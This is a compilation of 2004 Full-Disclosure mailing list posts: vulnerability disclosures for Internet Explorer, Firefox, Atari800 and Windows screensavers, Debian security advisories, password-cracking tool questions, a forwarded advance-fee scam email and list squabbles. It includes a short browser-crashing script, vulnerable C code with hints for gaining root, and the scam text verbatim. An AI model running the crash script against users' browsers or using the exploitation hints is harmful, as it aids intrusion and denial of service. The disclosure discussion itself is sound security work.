Re: [Full-Disclosure] irc legaility
Hello Simon, Saturday, November 20, 2004, 2:22:12 AM, you wrote: SL In the following scenario; you are a business, is IRC logs of SL conversations and lists of hosts be help up in a court of law if a SL client you spoke to refused to pay or hold up the end of a bargain SL or agreement, and is faxing a document (no hard copies sent via SL post) accepted as a legal document in a court of law. I Am Not A Lawyer... so don't trust me on questions of legality. but, from a logical standpoint: I think an independent third party present would greatly help in the IRC case. Create a channel, make sure noone else can get in, (though remember admins might still see what you're saying) invite the other party, and invite a recorderbot of some sort. The recorderbot would join, transmit a message to the channel saying I'm recording everything said here or something to the effect. After which the business part would start. I'm imagining something like a command !bind : Will all parties accept being bound to this agreement? and a command !finish after all have said yes. The finish command would cryptographically sign the log, send it to each participant, as well as store it somewhere. That should, provided the integrity of the recorderbot (and its hosts) (i.e. has not been hacked, trustworthy (independent?) admin) prove that a conversation, and its contents, has in fact taken place. Weaknesses: 1. It does not prove that the two parties both are who they would appear to be. The deal would not be valid if made with someone else. 2. The independentness and integrity of the recorderbot could be questioned. 3. Things I haven't thought of. (Anyone?) -- Best regards, Mariusmailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows user privileges
So it looks like MS itself will settle that one: [quote] --- [snip] Amongst the many things this malware does, all of which require admin rights, are: * Creating files in the system32 directory. * Terminating various processes. * Disabling the Windows Firewall. * Downloading and writing files to the system32 directory. * Deletes registry values in HKLM. All these fail if the user running the e-mail client is not an administrator. So wouldn't it be useful (read: safer) if you could browse the Web, read e-mail, and so on as a non-admin, even though you need to perform your normal daily tasks as an admin? __ [end quote] by Michael Howard (Senior Security Program Manager in the Secure Engineering group at Microsoft). The DropMyRights Application. http://msdn.microsoft.com/security/securecode/columns/default.aspx?pull=/library/en-us/dncode/html/secure11152004.asp This should be pushed as an update and the steps of shortcut described in the link automatised. BTW, after cracked Sound application for creating .wav, in that one we've got : Location: C:\warez\dropmyrights.exe c:\program files\internet explorer\iexplore.exe C:\warez . no comments. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception
Hi all,
Another flaw in IE:
HTML
SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT
SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT
/HTML
Normally I would see if it's exploitable but I figure I'm not MS's pet bug
finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know
their own product better then I do and can analyse the problem much faster. So
if you want to know the impact of this vulnerability, ask them: I'm sure they
will be more then willing to help you. I'm sure they will even reply to this
message with technical details and a patch tomorrow.
Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;)
But more on that later...
PS2. Recursive function call will cause stack overflow causing write exception
in guard page on a push, no control over registers.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MS Windows Screensaver Privilege Escalation
On Windows XP all releases, when you replace, or change the screensaver displayed on the login screen with a specially crafted version designed to execute programs, those programs are launched under the SYSTEM SID, IE: they are given automatically the highest access level avalible to Windows. This level is not accessible even to administrators. This flaw is important because while one would need Power User privledges or above to change the Login Screensaver, by default, any user with the exception of guest can replace the login screensaver file with a modified version. In theory, any determined user could execute ANYTHING with SYSTEM privledges. A similar flaw exists in Win2K, but Microsoft has ignored it. Interesting when read in the context of this: http://support.microsoft.com/default.aspx?scid=kb;en-us;221991sd=tech ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] John the Ripper MS-SQL patch
G'day list, I was just wondering if anyone had heard of/written a patch for John the Ripper which makes it possible to brute-force MS-SQL password hashes. Cheers, Calum -- Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic [EMAIL PROTECTED] http://www.fribble.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Name: Atari800
Vendor URL: http://atari800.sourceforge.net/
Author: Adam Zabrocki [EMAIL PROTECTED]
Date: November 20, 2004
Issue:
Atari800 - free and portable Atari800/XL/XE/5200 emulator allows attacker to
execute
shellcode with privileges suid root, where Atari800 is installed.
Description:
Atari800 is free and portable Atari800/XL/XE/5200 emulator, originally
written by David
Firth and now developed by the Atari800 Development Team. This program is
copyrighted and
released under the GPL.
Details:
Possible execute shellcode by function Aprint(), bad called in function
Atari800_Initialise()
Local users, able to run atari800 (in default installation atari800 have suid
root) are
able to execute shellcode with root privileges.
The problem lies in Atari800_Initialise() function, which do bad call for
function
Aprint().
src/atari.c
int Atari800_Initialise(int *argc, char *argv[])
{
int error = FALSE;
...
...
...
...
/*
* Any parameters left on the command line must be disk images.
*/
for (i = 1; i *argc; i++) {
if (!SIO_Mount(diskno++, argv[i], FALSE)) {
![1]! Aprint(Disk File %s not found, argv[i]);
error = TRUE;
}
}
if (error) {
![2]! Aprint(Usage: %s [options] [diskfile1...diskfile8], argv[0]);
Aprint(\t-help Extended Help);
Atari800_Exit(FALSE);
return FALSE;
}
...
...
}
Function Aprint() is written by program's autors.
src/log.c
void Aprint(char *format, ... )
{
va_list args;
char buffer[256];
#ifdef BUFFERED_LOG
int buflen;
#endif
va_start(args, format);
vsprintf(buffer, format, args);
va_end(args);
#ifdef BUFFERED_LOG
strcat(buffer, \n);
buflen = strlen(buffer);
if ((strlen(memory_log) + strlen(buffer) + 1) MAX_LOG_SIZE)
*memory_log = 0;
strcat(memory_log, buffer);
#else
printf(%s\n, buffer);
#endif
}
We can control argument argv[0] which is given for function Aprint(), which
do call
for vsprintf() function and in the and can do overflow. When we create symlink
to real
path to atari800 argv[0] will be changed. Exploiting this bug can gave root
privileges.
This bug exist in older Atari800 (i read source with version 1.3.0), in the
lasted version
there isn't overflow in Aprint() function. It was rewrited!
Atari800 have other bugs who exist when program read config file.
Bugs Exists in function RtConfigLoad()
src/rt-config.c
int RtConfigLoad(const char *alternate_config_filename)
{
FILE *fp;
const char *fname = rtconfig_filename;
int status = TRUE;
char string[256];
char *ptr;
...
...
while (fgets(string, sizeof(string), fp)) {
RemoveLF(string);
ptr = strchr(string, '=');
if (ptr) {
*ptr++ = '\0';
if (strcmp(string, OS/A_ROM) == 0)
![3]! strcpy(atari_osa_filename, ptr);
else if (strcmp(string, OS/B_ROM) == 0)
![4]! strcpy(atari_osb_filename, ptr);
else if (strcmp(string, XL/XE_ROM) == 0)
![5]! strcpy(atari_xlxe_filename, ptr);
else if (strcmp(string, BASIC_ROM) == 0)
![6]! strcpy(atari_basic_filename, ptr);
else if (strcmp(string, 5200_ROM) == 0)
![7]! strcpy(atari_5200_filename, ptr);
else if (strcmp(string, DISK_DIR) == 0) {
if (disk_directories == MAX_DIRECTORIES)
printf(All disk directory slots
used!\n);
else
![8]!
strcpy(atari_disk_dirs[disk_directories++], ptr);
}
else if (strcmp(string, ROM_DIR) == 0)
![9]! strcpy(atari_rom_dir, ptr);
else if (strcmp(string, H1_DIR) == 0)
![10]! strcpy(atari_h1_dir, ptr);
else if (strcmp(string, H2_DIR) == 0)
![11]! strcpy(atari_h2_dir, ptr);
else if (strcmp(string, H3_DIR) == 0)
![12]! strcpy(atari_h3_dir, ptr);
else if (strcmp(string, H4_DIR) == 0)
![13]! strcpy(atari_h4_dir, ptr);
...
else if (strcmp(string, EXE_DIR) == 0)
![14]! strcpy(atari_exe_dir, ptr);
Re: [Full-Disclosure] John the Ripper MS-SQL patch
Calum Power wrote: G'day list, I was just wondering if anyone had heard of/written a patch for John the Ripper which makes it possible to brute-force MS-SQL password hashes. Cheers, Calum -- Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic [EMAIL PROTECTED] http://www.fribble.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Hi list, On the same theme, I've been looking for a patch for John which allows it to brute-force MD5-APR. Anyone know of anything like this? Thanks in advance Luke ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
Hi, Agreed. But if the idea is to protect your internal clients from your intranet web servers, the proxy isn't doing much for you. Plus again, someone can just configure their machine to not use the proxy as mentioned previously. If the machines are available on the public intranet without having to go through some firewall, you can't slap much of a guarantee on things not reaching them except via your proxy. You mention setting up routing ACL policies for HTTP traffic further down. This isn't something that is reasonable to manage in a large organization and does nothing from stopping people from selecting alternate ports. Well if you stick a firewall inbetween and limit to only 80/443 and then redirect the requests to a web proxy(I know there are issues with https proxying, like MTM). Then you can filter/drop do what ever you like. Cheers, Dan. -- DanB UK London, UK ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Sta ck overflow exception
An email to [EMAIL PROTECTED] would have sufficed.
That email address can be found at
http://www.mozilla.org/security/bug-bounty.html
Phil
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort()
loop Stack overflow exception
Hi all,
Same flaw works for Firefox as well as MSIE:
HTML
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT /HTML
Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I didn't have
the time to do the crash course how to write a bug report
and go through all that bugzilla crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
- Original Message - From: Phillip R. Paradis [EMAIL PROTECTED] To: 'devis' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, November 25, 2004 6:51 PM Subject: RE: [Full-Disclosure] IE is just as safe as FireFox Nice ...fresh from the oven too. This, if it works, should be a 'extremely critical' update from Ms. Wouldn't such a tool be of limited utility, given that the unpriviliged application's windows are on the same desktop as, and can therefore send messages to, windows belonging to priviliged applications? I'm sorry but seeing other people insist that is OK to send American election stuff to the list, I thought it would be OK to translate your text into something that made sense so here goes: Un tal attrezzo non sarebbe di programma di utilit limitato, dato che unpriviliged le finestre dell'applicazione sono sullo stesso tavolo come e possono quindi trasmettere i messaggi a, le finestre che appartengono a priviliged le applicazioni? Naaa...sorry, I dont speak Italian so it didnt make sense to me that way, either. Gregh. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Sun Java Plugin arbitrary package access vulnerability
Jouko Pynnonen wrote: A vulnerability in Java Plugin allows an attacker to create an Applet which can disable Java's security restrictions and break out of the Java sandbox. skip The Java Plugin versions 1.4.2_04 and 1.4.2_05 were tested on Windows and Linux. Web browsers tested were Microsoft Internet Explorer, Mozilla Firefox and Opera. It should be noted that Opera uses a different way of connecting JavaScript and Java which caused the test exploit not to work on Opera. However the problem itself (access to private packages) was demonstrated on Opera too, so it may be vulnerable to a variation of the exploit. As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2, Opera 7.54, J2SE 1.4.2_06). According to Jouko, Opera does not use Java plugin, but has its own interface to Java. The fact that the problem is still present after JVM upgrade probably means that there is an independent bug in Opera Java interface which has the same effect as the bug in Sun Java Plugin. AFAIK there is no fix for Opera yet. I have reported this bug to Opera through their web interface (bug-158156). There is an online test for this bug at Browser Security Test (http://bcheck.scanit.be/bcheck/). Go to http://bcheck.scanit.be/bcheck/choosetests.php if you only want to run the test for this particular bug. Alla. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [SECURITY] [DSA 599-1] New tetex-bin packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 599-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 25th, 2004 http://www.debian.org/security/faq - -- Package: tetex-bin Vulnerability : integer overflows Problem-Type : remote Debian-specific: no CVE ID : CAN-2004-0888 Debian Bug : 278298 Chris Evans discovered several integer overflows in xpdf, that are also present in tetex-bin, binary files for the teTeX distribution, which can be exploited remotely by a specially crafted PDF document and lead to the execution of arbitrary code. For the stable distribution (woody) these problems have been fixed in version 20011202-7.3. For the unstable distribution (sid) these problems have been fixed in version 2.0.2-23. We recommend that you upgrade your tetex-bin packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3.dsc Size/MD5 checksum: 874 0774ffbc5e428a21939d7d10070ef12b http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3.tar.gz Size/MD5 checksum: 10329770 9ffa7015b10981c3524e8d6147f2c077 Alpha architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_alpha.deb Size/MD5 checksum:84664 7b82ef947ccbd60c57e31fa1cdbceeae http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_alpha.deb Size/MD5 checksum:53042 e14d212ec7d9a21859b443ea11210d12 http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3_alpha.deb Size/MD5 checksum: 4568870 d8a00aedde830f02a46f70ae97bcdfbc ARM architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_arm.deb Size/MD5 checksum:65256 c7fb486f0e58d6f90a080313ade6d980 http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_arm.deb Size/MD5 checksum:43610 acf504677a35232f075cb6368cb73c4f http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3_arm.deb Size/MD5 checksum: 3703874 25b4e1d62d2b010382bb74e610f7de32 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_i386.deb Size/MD5 checksum:62598 6c11adfac9cbe8007aa89fa91bef57da http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_i386.deb Size/MD5 checksum:40742 afda3a9de40083b9fb4a9d92a57749f3 http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3_i386.deb Size/MD5 checksum: 3137234 898331b25326db5114be3fde93b191d1 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_ia64.deb Size/MD5 checksum:89716 c18229e93ad1bcd55a4baf9236798545 http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_ia64.deb Size/MD5 checksum:63354 67c881d278113cd980dcfba6b52b2b1a http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3_ia64.deb Size/MD5 checksum: 5598790 7e42e2710c659668fd6cb49ee73d333d HP Precision architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_hppa.deb Size/MD5 checksum:79336 56b55b712e71ff618a1f861fe79ec21c http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_hppa.deb Size/MD5 checksum:49324 8577bdb403711604e3ff31cef86a9f1a http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.3_hppa.deb Size/MD5 checksum: 4106740 0f07a18dd4762a7d4bd5ea0881b8a80e Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.3_m68k.deb Size/MD5 checksum:61894 645b35f6e1d139a50f2fbd33be3c985b http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.3_m68k.deb Size/MD5 checksum:41370
[Full-Disclosure] Fwd: Hi, It's Me !!!!!
-- Forwarded message -- From: [EMAIL PROTECTED] [EMAIL PROTECTED] Date: Wed, 24 Nov 2004 21:08:16 -0800 Subject: Hi, It's Me ! To: FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ). Dear, I am Wisdom Joshua Esq., a Senior Advocate of Nigeria . I am the legal Representative to Mr. Harold Lebron, a national of your country, who used to work with Shell Development Company in Nigeria. Here in after shall be referred to as my client. On the 21st of April 2001, my client, his wife and their only daughter were involved in a fire outbreak in there residence. All of the family members unfortunately lost there lives. Since then I have made several enquiries to your embassy here to locate any of my clients extended relatives, this has also proved unsuccessful. After these several unsuccessful attempts, I decided to track his closest relations over the Internet, hence I contacted you. I have contacted you to assist in returning the fund valued at 16,000,000.00 USD left behind by my client before it gets confiscated or declared unserviceable by the Vault Company or Managers where this huge amount were Lodged. The said Finance Company has issued me a notice to provide the relatives or families of the deceased or have the account confiscated within the next fourteen official working days. For the fact that I have been unsuccessful in locating the relatives for over 2 years now, I seek the consent to present you as the family member to the deceased, so that the proceeds of this account can be paid to you. Secondly he has a consignment tagged 'family valuables' he shipped or lifted by as cargo to Europe early the same year he died, according to the information he passed to me, it is of a important to him. Therefore, if you are interested, endeavor to reach me immediately on my other email as thus: [EMAIL PROTECTED] to enable me inform you the modalities on how to carry out this project. I have all necessary information and legal documents needed to back you up for claim. All I require from you is your honest cooperation to enable us see this transaction through. I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law. Please get in touch with me as soon as possible to enable us conclude in this matter. Best regards, Barrister Wisdom Joshua Esq. Metti il faccione di Shrek sul tuo cellulare! http://www.specialeshrek.canale5.com -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [SECURITY] [DSA 598-1] New yardradius packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 598-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 25th, 2004 http://www.debian.org/security/faq - -- Package: yardradius Vulnerability : buffer overflow Problem-Type : remote Debian-specific: no CVE ID : CAN-2004-0987 Debian Bug : 278384 Max Vozeler noticed that yardradius, the YARD radius authentication and accounting server, contained a stack overflow similar to the one from radiusd which is referenced as CAN-2001-0534. This could lead to the execution of arbitrary code as root. For the stable distribution (woody) this problem has been fixed in version 1.0.20-2woody1. For the unstable distribution (sid) this problem has been fixed in version 1.0.20-15. We recommend that you upgrade your yardradius package immediately. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1.dsc Size/MD5 checksum: 630 3aa3c2019a9a5114e0f531fe808e93b3 http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1.diff.gz Size/MD5 checksum: 6768 f3643f6f13de7280c19e4c7df503ea11 http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20.orig.tar.gz Size/MD5 checksum: 399573 787b1f8784c67cab2702839db6644b9b Alpha architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_alpha.deb Size/MD5 checksum: 350220 e0274a5766e8c3d18800c06282727df1 ARM architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_arm.deb Size/MD5 checksum: 301448 06828b440337022ae6b1855fbae31f82 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_i386.deb Size/MD5 checksum: 295412 4f56c4fdeca63b85808065b4f3e27a7f Intel IA-64 architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_ia64.deb Size/MD5 checksum: 370222 36703ed2eed705e8e1a3397a3d88d427 HP Precision architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_hppa.deb Size/MD5 checksum: 312196 59888ec88aa91f6cf58dda032df8a5b5 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_m68k.deb Size/MD5 checksum: 289912 55788e327ca665e7ab889e82b8dec833 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_mips.deb Size/MD5 checksum: 326438 6e7d29dd1ad61bffef233c031fe7e73c Little endian MIPS architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_mipsel.deb Size/MD5 checksum: 327300 4a0a6d0009d271f458d2c7b87ea1a9f2 PowerPC architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_powerpc.deb Size/MD5 checksum: 302024 69d8d6a7d65e1dbd006309420926cb94 IBM S/390 architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_s390.deb Size/MD5 checksum: 298984 0551ab5072e14b3eeb81e23c3a4658df Sun Sparc architecture: http://security.debian.org/pool/updates/main/y/yardradius/yardradius_1.0.20-2woody1_sparc.deb Size/MD5 checksum: 325768 2edb916d3d3dda25e8919b32ba3e96ba These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFBpeIeW5ql+IAeqTIRAscOAJ0fC7lG+G5AI+KfRRZQWRBYTRThEwCgiEed A/9d82Y3IM+zHtYA5Pn2Oyk= =ctuq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter:
RE: [Full-Disclosure] John the Ripper MS-SQL patch
I haven't seen a patch that makes John capable of this, but I guess it wouldn't be impossible. You can look at ForceSQL v2.0 and Hydra. Hydra is put out by THC and should be able to do what you want John to do for you. -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Calum Power Sent: Thursday, November 25, 2004 2:32 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] John the Ripper MS-SQL patch G'day list, I was just wondering if anyone had heard of/written a patch for John the Ripper which makes it possible to brute-force MS-SQL password hashes. Cheers, Calum -- Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic [EMAIL PROTECTED] http://www.fribble.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Wed, 24 Nov 2004 21:17:24 -0600, vord [EMAIL PROTECTED] wrote: this is quite possibly the most ridiculous thing ive ever read. normally i would respond to it in more detail but i have received literally dozens of responses from members of this list who either sympathize with my position or have outright called you an idiot/lamer. i therefore see no need to defend myself or #hackphreak publicly when the public does not require it. they already know you're a moron, i dont need to beat a dead horse by making you look the fool over and over again. I'm sure all your script kiddie friends are backing you up, I don't doubt it for a second. That doesn't mean your right, it just means you have alot of script kiddie friends with the same views as yourself. It sounds like you've got the script kiddie support of the FD list. What an achievement, you must be so proud of yourself, so proud you had to post it on FD how many private e-mails you get off-list agreeing with you. If i'm an idiot lamer, i'd hate to hear what they're calling you. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] More Browser flaws on MACOSX: nested array sort() loop Stack overflow exception
Same problems on MACOSX 10.3.6 with:-Safari 1.2.4-Mozilla 1.7-Camino 0.7.0-Firefox 1.0-Opera 6.0.3Not affected IE 5.2.3Regards--Marco- Hi all, Same flaw works for Firefox as well as MSIE: Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course "how to write a bug report" and go through all that bugzilla crap. Cheers, SkyLined http://www.edup.tudelft.nl/~bjweverCONFIDENTIALITY NOTICEThis message and its attachments are addressed solely to the personsabove and may contain confidential information. If you have receivedthe message in error, be informed that any use of the content hereofis prohibited. Please return it immediately to the sender and deletethe message. Should you have any questions, please contact us byreplying to [EMAIL PROTECTED]. Thank you www.telecomitalia.it
Re: [Full-Disclosure] Shellcode encoder used in IFRAME exploit.
On Wednesday 24 November 2004 2:44 pm, Berend-Jan Wever wrote: Hi all, I have been getting a lot of questions about the encoded shellcode I used in InternetExploiter. That's why I've decided to release the source to my encoder, so you can all use it in your personal version of my exploit. (Remember that the origional code was released under GPL! I'm still hoping I get to see the guy who wrote those MyDoom worms in court, he violated the GPL and spread millions(?) of copies of my (modified) source). I'm pretty sure the author didnt do that, and even if (s)he did, its not necesarily illegal, you may havent read the license :-) Max -- Linux garaged 2.6.9-ac9 #2 SMP Tue Nov 16 17:07:13 CST 2004 i686 Intel(R) Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux -BEGIN GEEK CODE BLOCK- Version: 3.12 GS/S d- s: a-29 C++(+++) ULAHI+++ P+ L+ E--- W++ N* o-- K- w O- M-- V-- PS+ PE Y-- PGP++ t- 5- X+ R tv++ b+ DI+++ D- G++ e++ h+ r+ z** --END GEEK CODE BLOCK-- gpg-key: http://garaged.homeip.net/gpg-key.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception
On Thu, 25 Nov 2004 01:41:20 +0100
Berend-Jan Wever [EMAIL PROTECTED] wrote:
HTML
SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); }
/SCRIPTSCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
/HTML
Also Opera 7.54 should be added, it crashes on the above code, at least
the native FreeBSD version
--
Adrian Pircalabu
Public KeyID = 0xF902393A
--
This message was scanned for spam and viruses by BitDefender
For more information please visit http://www.bitdefender.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] The Tel Aviv Univeristy Security Forum - meeting #6 -19/12/04
Hello! The next, non-commercial, technological Security Forum will take place on Sunday, the 19th of December, 2004, at Tel Aviv University's Lev Auditorium. 112 people came to our last meeting on the 17th of October. The air conditioner worked well, but it wasn't cold enough (at least for me personally). Schedule 17:45 - Gathering - hot and cold drinks will be served. 18:00 - Golan Brener, Director - B.GRG LTD. Lecture: Wireless hacking technology. Level: Technological. There will be a discussion of protocols and techniques. Golan will discuss different wireless protocols, their weaknesses, implementations and ways of protecting and breaking them. There will be wireless hacking demonstrations, but the bulk of the lecture will be about the technology itself - and not necessarily just the protocols and/or vulnerabilities we are all familiar with. 19:20 - We will break for a short recess, as well as for refreshments and networking between members - hot and cold drinks will be served. 19:40 - Ofir Liber, adv. Information Security Dept. Manager, Internet Zahav. Lecture: The Trojan horse defense. Level: This lecture will be suited for all levels. In his lecture, Ofir will discuss the legal defense known as the Trojan horse defense. I.e., I didn't do it! It was the evil hacker who broke into my PC!. Ofir will provide with a general overview, legal issues, defending and prosecuting with that pretense, is it even viable? etc. Hot and cold drinks will be freely available. Attendance is free. For a map of the university please visit: http://www2.tau.ac.il/map/unimapl1.asp For future and past lectures, presentations and general information: http://www.cs.tau.ac.il/tausec You can also visit our Orkut community (Tausec): http://www.orkut.com/Community.aspx?cmm=422590 Thank you all, and please pass this information to others. Who we are -- The Security Forum, hosted by the Tel Aviv University, started when a few of us talked about there being an (almost) complete lack of professional and social events on security in Israel which are not completely commercial and about sticking products down out throats. We decided to do instead of complain, and here we are. In previous meetings we had over a hundred arrivals, varying from soldiers and students, through programmers and government CSO's, all the way to CEO's and CTO's of different companies, banks and other institutions. Some have been part of our community since the 70's and some are just people who are interested in the subject. Have a good week, Gadi Evron. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Limited buffer-overflow and arbitrary memory access in Star Wars Battlefront 1.11
